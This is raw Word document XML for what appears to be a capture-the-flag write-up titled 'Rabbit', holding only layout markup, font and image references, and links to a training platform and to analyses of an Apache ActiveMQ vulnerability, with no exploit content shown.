                  <a:blip r:embed="rId1"/>
                  <a:srcRect b="8816" l="0" r="0" t="0"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="7820025" cy="10085729"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect"/>
                  <a:ln/>
                </pic:spPr>
              </pic:pic>
            </a:graphicData>
          </a:graphic>
        </wp:anchor>
      </w:drawing>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-344480</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5771833</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6686550" cy="3005191"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="46" name=""/>
              <a:graphic>
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvSpPr/>
                    <wps:cNvPr id="2" name="Shape 2"/>
                    <wps:spPr>
                      <a:xfrm>
                        <a:off x="2390550" y="2454150"/>
                        <a:ext cx="5910900" cy="2651700"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </wps:spPr>
                    <wps:txbx>
                      <w:txbxContent>
                        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000">
                          <w:pPr>
                            <w:spacing w:after="120" w:before="480" w:line="275.9999942779541"/>
                            <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                            <w:jc w:val="center"/>
                            <w:textDirection w:val="btLr"/>
                          </w:pPr>
                          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                            <w:rPr>
                              <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
                              <w:b w:val="0"/>
                              <w:i w:val="1"/>
                              <w:smallCaps w:val="0"/>
                              <w:strike w:val="0"/>
                              <w:color w:val="ffffff"/>
                              <w:sz w:val="48"/>
                              <w:vertAlign w:val="baseline"/>
                            </w:rPr>
                            <w:t xml:space="preserve">Writeup - </w:t>
                          </w:r>
                          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                            <w:rPr>
                              <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
                              <w:b w:val="0"/>
                              <w:i w:val="1"/>
                              <w:smallCaps w:val="0"/>
                              <w:strike w:val="0"/>
                              <w:color w:val="ffffff"/>
                              <w:sz w:val="48"/>
                              <w:vertAlign w:val="baseline"/>
                            </w:rPr>
                            <w:t xml:space="preserve">Rabbit</w:t>
                          </w:r>
                        </w:p>
                      </w:txbxContent>
                    </wps:txbx>
                    <wps:bodyPr anchorCtr="0" anchor="ctr"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-344480</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5771833</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6686550" cy="3005191"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="46" name="image28.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image28.png"/>
                      <pic:cNvPicPr preferRelativeResize="0"/>
                    </pic:nvPicPr>
                    <pic:blipFill>
                      <a:blip r:embed="rId2"/>
                      <a:srcRect/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </pic:blipFill>
                    <pic:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="6686550" cy="3005191"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect"/>
                      <a:ln/>
                    </pic:spPr>
                  </pic:pic>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Fallback>
      </mc:AlternateConten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5">
    <w:pPr>
      <w:pBdr>
        <w:top w:space="0" w:sz="0" w:val="nil"/>
        <w:left w:space="0" w:sz="0" w:val="nil"/>
        <w:bottom w:space="0" w:sz="0" w:val="nil"/>
        <w:right w:space="0" w:sz="0" w:val="nil"/>
        <w:between w:space="0" w:sz="0" w:val="nil"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="center" w:leader="none" w:pos="4252"/>
        <w:tab w:val="right" w:leader="none" w:pos="8504"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:rPr>
        <w:color w:val="000000"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:color w:val="000000"/>
      </w:rPr>
      <w:pict>
        <v:shape id="WordPictureWatermark2" style="position:absolute;width:617.76pt;height:793.4866141732284pt;rotation:0;z-index:-503316481;mso-position-horizontal-relative:margin;mso-position-horizontal:center;mso-position-vertical-relative:margin;mso-position-vertical:center;" alt="" type="#_x0000_t75">
          <v:imagedata cropbottom="0f" cropleft="0f" cropright="0f" croptop="0f" r:id="rId1" o:title="image3.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footer" Target="footer2.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId23"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26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.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9.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://app.hackingclub.com/training/training-machines/22" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://discord.com/channels/705946302105649153/1173705871046475796" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://paper.seebug.org/346/" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@knownsec404team/analysis-of-apache-activemq-remote-code-execution-vulnerability-cve-2016-3088-575f80924f30" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://paper.seebug.org/346/"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IBMPlexSans-regular.ttf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSans-bold.ttf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSans-italic.ttf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSans-boldItalic.ttf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-italic.ttf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-bold.ttf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-boldItalic.ttf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-regular.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9.jpg"/><Relationship Id="rId2"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10.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.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GOxHyxAIx6S7GxNebBhmhnsI2Qw==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLjFtNDNvb3NvZ212YTIOaC43cjJvYnE4aHllcGoyDmguMWo3N2dvOGNveDc3Mg5oLmE0OG8wajZ5OTJkcjINaC5wemhsM3o5dnA3ZTIOaC42cHhlZWo3cGw1NGkyDmguNHpyOWxrcngzYzlqMg5oLjVyajJyZGQ1dG9jMDIOaC51NzdsY254aDVpcHoyDmguMzBqYTlrMjE1bHF5Mg5oLmd0MDAyeGN2emUyYTIOaC44bzdrOW1ob2FueXoyDWguZXlyOHFsM3BqZTMyDmguMTc1ZjVjczk0ejBvOAByITFCX082aVhRaUY5NEgwbWs5dEk4c3NuUmdDQnpZZmg5V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